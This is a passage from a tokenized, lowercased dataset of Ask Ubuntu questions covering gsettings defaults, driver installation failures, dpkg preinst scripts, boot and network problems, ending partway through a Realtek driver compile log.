196896	how to read default key value with dconf or gsettings ?	i would like to know the default value of a dconf/gsettings key . my question is a followup of the question below : where can i get a list of schema / path / key to use with gsettings ? what i 'm trying to do , so create a script that reads all my personal preferences so i can back them up and restore them . i plan to iterate though all keys , like the script above , see what keys have been changed from their default value , and make a note of these , that can be restored later . i see that the dconf-editor display the keys ' default value , but i 'd very much like to script this . also , i do n't see how parsing the schemas /usr/share/glib-2.0/schemas/ can be automated . maybe someone can help ? gsettings get-default|list-defaults would be nice = ) ( geesh , it was much easier in the old days where you just kept your ~/.somethingrc in subversion ... =\ based on the answer given below , i 've updated the script to print schema , key , key 's data type , default value , and actual value : # ! /bin/bash for schema in $ ( gsettings list-schemas | sort ) ; do for key in $ ( gsettings list-keys $ schema | sort ) ; do type= '' $ ( gsettings range $ schema $ key | tr `` \n '' `` `` ) '' default= '' $ ( xdg_config_home=/tmp/ gsettings get $ schema $ key | tr `` \n '' `` `` ) '' value= '' $ ( gsettings get $ schema $ key | tr `` \n '' `` `` ) '' echo `` $ schema : : $ key : : $ type : : $ default : : $ value '' done done this workaround basically covers what i need . i 'll continue working on the backup scrip from here .
196897	upgrade subversion to 1.7 on 8.04	it comes with version 1.5 and i 'd like to update it to 1.7 . is it possible ? it seems that i do n't have apt-add-repository on this system .
196902	how to open applications ?	how to open apps in ubuntu 12.04 to read documents , play music and video , surf the net and reading emails ?
196903	how to configure ubuntu ?	i can not find a place like control panel in windows where i can configure ubuntu . i would be delighted to find where to configure the system . and by the way , how to use the configure ubuntu according to my own appetite ?
196922	weird title bar	i have got weird problem with ambiance ( it happened suddenly , no changes made by me ) : title bar in all apps ca n't be set to ambiance , it simply does n't change . does anybody meet such problem ?
196923	difference between ubuntu desktop.iso version and dvd.iso version ?	can anyone tell me what the basic difference between the two is ? and what would you recommend for a beginner ?
196925	i dont know where to go to learn more	hi my name is kgosi i live in south africa and i would like to learn more about ubuntu how to use it e.t.c . can any1 refer any good books websites and tutorials . i would also like to learn about networks and embedded systems any good books websites e.t.c would be much appreciated
196931	android sdk file permission	i have been trying to access the file for a while now and it says that i do n't have the permission to enter the file . obviously , the user that is shown is not me . i am currently using ubuntu 12.04lts and i would like to know what can i do with that . thank you !
196933	hdd on a router	i am using ubuntu 12.04lts . i am using a d-link router for our wifi here and we have connected an hdd via usb onto it . i am wondering how can i log myself into it without using the program they are giving for windows ... the program is called d-link shared port plus . i know its ip adress and everything but i do n't know what protocol it uses . thank you !
196936	input signal out of range 1920x1080	i 've recently installed ubuntu 12.04 on my computer . now , every time i boot and when i shut down , my monitor goes blank and says `` input signal out of range - change setting to 1920x1080 60hz . '' once the computer gets to the login screen , it 's okay again . this problem also happens when i try to open any 3d app . my graphics card is nvidia geforce 6150 se . i tried updating the drivers , but it broke everything and i had to reinstall ubuntu . any help ?
196943	xubuntu loading slow after the session/password select	i recently installed xubuntu on my computer . i love the distro . everything was fast , and then the bootup slowed down . it started taking a couple minutes for my user selected wallpaper to show and the menu to appear , basically do anything on the comp . i do not recall doing anything other than changing the swappiness . it did not affect it initially . would that be something to affect it or are there other ideas that might have caused this sudden change .
196953	parsing a html page with bash	i 'm trying to write a bash script that will extract informations from a html page ( using wget ) . i know my informations will be between < h* > tags , but is there a nice way to get those ? to be more precise let 's have an example : < h1 > header1 < /h1 > < h2 > header2 < /h2 > < h2 > otherheader2 < /h2 > < h1 > lastheader1 < /h1 > < h2 > lastheader2 < /h2 > i 'd like to extract `` otherheader2 '' , a.k.a . the second ( but it could be anywhere ) header afer the header1 .
196954	installing applications on a usb drive	i 'm running ubuntu off an 8gb usb drive but it 's almost full ; is there a way to install my applications on a different usb drive . it 's been suggested that raid 1 will work but will that just duplicate my files ?
196955	how to start windows 7 after setting wait time = 0	after i installed 12.04 , i think waiting a long time to choose between windows 7 and ubuntu is such a waste . so i went into windows 7 and set the default to ubuntu and no waiting time ( not the grub in ubuntu ) . now i can only access ubuntu but i have something to do with windows 7 . i wonder how can i enter windows 7 ? there is no windows 7 in my grub menu . even if i add one in , it said no such thing . since this is windows 7 , i ca n't edit boot.ini to fix it . i have tried to punch f8 or the down arrow to stop the system turn to ubuntu but , they all failed . i just want to enter windows 7 and change that damn waiting time .
196959	ubuntu 12.04 can not be powered off completely	i have installed ubuntu 12.04 recently . when i try to power off , the hard disk seem to be powered off . however , the computer can not be powered off completely . the power light and bluetooth light is still on . it usually happens when i use the computer for a while . if i try to power off just after starting , it would probably succeed .
196960	find directories that do n't contain a file	yes , i 'm sorting out my music . i 've got everything arranged beautifully in the following mantra : /artist/album/track - artist - title.ext and if one exists , the cover sits in /artist/album/cover. ( jpg|png ) . i want to scan through all the second-level directories and find the ones that do n't have a cover . by second level , i mean i do n't care if /britney spears/ does n't have a cover.jpg , but i would care if /britney spears/in the zone/ did n't have one . do n't worry about the cover-downloading ( that 's a fun project for me tomorrow ) i only care about the glorious bash-fuiness about an inverse-ish find example .
196962	how do i get sound into my computer monitor speakers ?	i do n't know why but sound only comes out out my headphones and not my monitor speakers . it says it 's working but it says the line-in is not connected . it also says i have a microphone connected , but i dont have a microphone . what do i do ?
196964	how to install .deb file from within preinst script ?	i have my own application packaged using dpkg . the application depends on several .deb files which i 'm trying to install from within the preinst script of my application . the preinst script checks if a dependent deb file is installed , if not it goes to install it using the dpkg -i command . this is repeated for all the dependent deb files needed by the main application . when i try to install the main application using dpkg -i , the commands returns failure when trying to execute the preinst script . below is that error message : dpkg : error : dpkg status database is locked by another process i deleted /var/lib/dpkg/lock file and retried to install the application . but to no avail . if i run the preinst script separately like any other shell script , it runs without any issue . all the deb files will be installed properly . so , the issue is only when this preinst script is being run automatically by the dpkg -i command . i 'm lost trying to determine the root cause . if anyone can shed some light on what the real issue might be , their help will be greatly appreciated . thank you , obsessivess0f for your quick response . i understand the point you are making but that will not help my situation . let me tell you why . my main application ( let 's say mainapp.deb ) depends on five other .deb files ( let 's say 1.deb , 2.deb and so on ) . the dependent .deb files are my own private packages/libraries . so these are not downloadable from the web . so , i can not use apt-get to install these automatically . i would make the `` depends '' field in the control file to point to 1.deb , 2.deb..etc , but as you know dpkg -i will not automatically install the dependencies . i can execute dpkg -i , followed by apt-get -f install , but for apt-get to work , i have to edit the /etc/apt/sources.list file to add a reference to the local directory on the system where the dependent .deb files are stored . well , # 4 seems to work but is not an option for me because this application will be installed on many servers and the installation program has to be fully automated . i continued to investigate the reason why preinst was failing to install the .deb files and i think i have found out why . when i run dpkg -i mainapp.deb , the dpkg process is creating the /var/lib/dpkg/lock and some files under /var/lib/dkpg/updates directory . now , the preinst script has a series of dpkg -i commands to install the dependent .deb files . so , as soon as the first dpkg -i command in the preinst script is executed , it fails because of the locks created by the earlier dpkg command . it seems that two dpkg commands can not be executed in parallel because of the locks . i modified the preinst script to backup the locks created by the dpkg process to a temporary location and deleted the original locks . ( the lsof command did report that the locks were deleted ) . now that the locks were gone , the dpkg -i commands within the preinst script executed without any issues . i restored the locks back before exiting the preinst script so that the primary dpkg -i command could continue . it worked but i have a feeling that this is not the right approach . i 'm still trying to figure out alternate ways for installing a .deb file along with it 's dependencies .
196971	unity failure on 12.10 after upgrade from 12.04	after upgrade to 12.10 , ubuntu starts as normal however the system only loads the desktop background , the left/upper bars is not displayed and ubuntu reports that gnome-control-center failed . problem fixed after un-installing fglrx .
196973	ca n't update nvidia driver and having error near the end of the installation	i had just got ubuntu ( first timer to ubuntu so be very descriptive ) . i think there a problem with my nvida update it wo n't let me update it . this is the name of the update in update manager nvidia binary xorg driver , kernel module and vdpau library . when i attempt to install it , it starts out fine but near the end i get a window titaled package operation failed with these under the details installarchives ( ) failed : setting up nvidia-current ( 295.40-0ubuntu1 ) ... update-initramfs : deferring update ( trigger activated ) info : enable nvidia-current debug : parsing /usr/share/nvidia-common/quirks/put_your_quirks_here debug : parsing /usr/share/nvidia-common/quirks/dell_latitude debug : parsing /usr/share/nvidia-common/quirks/lenovo_thinkpad debug : processing quirk latitude e6530 debug : failure to match gigabyte technology co. , ltd. with dell inc. debug : quirk does n't match debug : processing quirk thinkpad t420s debug : failure to match gigabyte technology co. , ltd. with lenovo debug : quirk does n't match removing old nvidia-current-295.40 dkms files ... loading new nvidia-current-295.40 dkms files ... error ! dkms tree already contains : nvidia-current-295.40 you can not add the same module/version combo more than once . dpkg : error processing nvidia-current ( -- configure ) : subprocess installed post-installation script returned error exit status 3 processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-31-generic warning : no support for locale : en_us.utf8 errors were encountered while processing : nvidia-current error in function : setting up nvidia-current ( 295.40-0ubuntu1 ) ... update-initramfs : deferring update ( trigger activated ) info : enable nvidia-current debug : parsing /usr/share/nvidia-common/quirks/put_your_quirks_here debug : parsing /usr/share/nvidia-common/quirks/dell_latitude debug : parsing /usr/share/nvidia-common/quirks/lenovo_thinkpad debug : processing quirk latitude e6530 debug : failure to match gigabyte technology co. , ltd. with dell inc. debug : quirk does n't match debug : processing quirk thinkpad t420s debug : failure to match gigabyte technology co. , ltd. with lenovo debug : quirk does n't match removing old nvidia-current-295.40 dkms files ... loading new nvidia-current-295.40 dkms files ... error ! dkms tree already contains : nvidia-current-295.40 you can not add the same module/version combo more than once . dpkg : error processing nvidia-current ( -- configure ) : subprocess installed post-installation script returned error exit status 3 processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.2.0-31-generic warning : no support for locale : en_us.utf8
196976	language support : unable to install spanish or french , ca n't create directories	i wanted to install another language onto my computer . the thing is that they are installed and the software is n't able to find them or bring them as an option . so what can i do to make it work ? here 's what i can see when i install the specific language : we can see that the problem has a link to directories that the language is unable to create for a reason i do n't know .
196979	uninstalling grub from macbook air	i have a macbook air and i recently tried to install ubuntu on my external hd . i booted ubuntu from a flash drive and everything had gone fine . i turned off my computer and when i turned it on again i got a message of error and a `` grub rescue '' line to enter some code . i rebooted holding the `` option '' key and i selected the mac partition and everything is fine with my system , but every time i start my system and i do n't hold the `` option '' key , i get the same error and the grub rescue message . i just want things to go back to normal , as they were before i installed ubuntu on my external hd ( which , btw , presented a message that said there was no boot loader ) . what do i do ?
196986	change mod key in xmonad+gnome ?	i 'm using gnome+xmonad , and i 'm trying to set the mod key to the windows key . i set my .xmonad.hs file to : import xmonad import xmonad.config.gnome main = xmonad gnomeconfig mymodmask = mod4mask i tried to reload the file with alt+q , but no change seems to have occurred . any suggestions ? i 'm far from a power user .
196987	internet connectivity issues	i 'm on 12.04 , i upgraded a month ago from windows 7 on my sony vaio . everything is great except after the upgrade , i encountered internet connectivity issues . when browsing the web or loading videos , my internet will stop working in the middle and come back after a period of 30 seconds to 2 minutes or sometimes it just wo n't and i 'll have to disconnect and re-connect to the network . i 've noticed the issue when sending e-mails as well , they just wo n't send at all . it says sending request and the circle keeps spinning slowly until i get to a page where it says the page would n't load and gives me the reason dns error . i tried setting opendns as my dns provider but that did n't help . edit : error message is actually `` webpage not found because the dns lookup failed '' i decided to take out my wireless adapter and use a new usb d-link dwa-160 revision b2 . i 'm still getting the same issues with internet connectivity dropping during the loading of connections . the same connectivity issues plague me even while connected through the ethernet port . i have no wireless adapter in my computer and an ethernet port as well but i have the same connectivity issues and dropping of the connection randomly so i ca n't figure out the cause .
196988	trying to install realtek drivers for asus usb-n13 , encountering `` compile make driver error : 2 ''	i 'm trying to put an asus usb-n13 wireless adapter in my desktop running ubuntu 12.04 . the details of my problem are identical to the one described in this question : connecting asus usb-n13 wireless adapter . as such , i 'm running through the exact steps laid out in the top-rated answer to that question . all was going well until i get to building the drivers . sudo bash install.sh produces the following output : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # realtek wi-fi driver auto installation script novembor , 21 2011 v1.1.0 # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # decompress the driver source tar ball : rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405.tar.gz rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/autoconf_rtl8712_usb_linux.h rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/clean rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl8712_cmd.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/config rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/crypto/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/crypto/rtl871x_security.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/debug/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/debug/rtl871x_debug.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/eeprom/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/eeprom/rtl871x_eeprom.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/efuse/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/efuse/rtl8712_efuse.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/hal/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/hal/rtl8712/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/hal/rtl8712/hal_init.c [ ... truncated for space ... ] rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/ioctl/rtl871x_ioctl_linux.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/ioctl/rtl871x_ioctl_query.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/ioctl/rtl871x_ioctl_rtl.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/ioctl/rtl871x_ioctl_set.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/kconfig rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/led/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/led/rtl8712_led.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/makefile rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/mlme/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/mlme/ieee80211.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/mlme/rtl871x_mlme.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/mp/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/mp/rtl871x_mp.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/mp/rtl871x_mp_ioctl.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_dep/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_dep/linux/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_dep/linux/cmd_linux.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_dep/linux/ioctl_cfg80211.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_dep/linux/io_linux.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_dep/linux/mlme_linux.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_dep/linux/recv_linux.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_dep/linux/rtw_android.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_dep/linux/xmit_linux.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_intf/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_intf/linux/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_intf/linux/os_intfs.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_intf/linux/usb_intf.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/os_intf/osdep_service.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/pwrctrl/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/pwrctrl/rtl871x_pwrctrl.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/recv/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/recv/rtl8712_recv.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/recv/rtl871x_recv.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/rf/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/rf/rtl8712_rf.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/rf/rtl871x_rf.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/runwpa rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/sta_mgt/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/sta_mgt/rtl871x_sta_mgt.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/wlan0dhcp rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/wpa1.conf rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/xmit/ rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/xmit/rtl8712_xmit.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/xmit/rtl871x_xmit.c rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405 authentication requested [ root ] for make clean : rm -fr *.mod.c *.mod *.o . *.cmd *.ko *~ rm .tmp_versions -fr ; rm module.symvers -fr cd cmd ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd crypto ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd debug ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd eeprom ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd hal/rtl8712 ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd io ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd ioctl ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd led ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd mlme ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd mp ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_dep/linux ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_intf ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd os_intf/linux ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd pwrctrl ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd recv ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd rf ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd sta_mgt ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd xmit ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko cd efuse ; rm -fr *.mod.c *.mod *.o . *.cmd *.ko authentication requested [ root ] for make driver : make arch=x86_64 cross_compile= -c /lib/modules/3.2.0-23-generic/build m=/home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405 modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.2.0-23-generic' cc [ m ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.o in file included from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c:23:0 : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/osdep_service.h : in function ‘_init_timer’ : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/osdep_service.h:151:17 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] in file included from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/rtl871x_ht.h:25:0 , from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/drv_types.h:67 , from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c:24 : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h : in function ‘get_da’ : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:350:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:350:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:353:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:353:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:356:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:356:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:359:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:359:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h : in function ‘get_sa’ : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:374:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:374:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:377:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:377:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:380:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:380:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:383:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:383:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h : in function ‘get_hdr_bssid’ : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:397:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:397:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:400:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:400:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:403:9 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/wifi.h:403:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] in file included from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/drv_types.h:70:0 , from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c:24 : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/rtl871x_cmd.h : at top level : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/rtl871x_cmd.h:107:25 : error : field ‘event_tasklet’ has incomplete type in file included from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/drv_types.h:72:0 , from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c:24 : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/rtl871x_xmit.h:355:24 : error : field ‘xmit_tasklet’ has incomplete type in file included from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/drv_types.h:73:0 , from /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/cmd/rtl871x_cmd.c:24 : /home/thinkpad20/downloads/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/driver/rtl8712_8188_8191_8192su_usb_linux_v2.6.6.0.20120405/include/rtl871x_recv.h:205:24 : error : 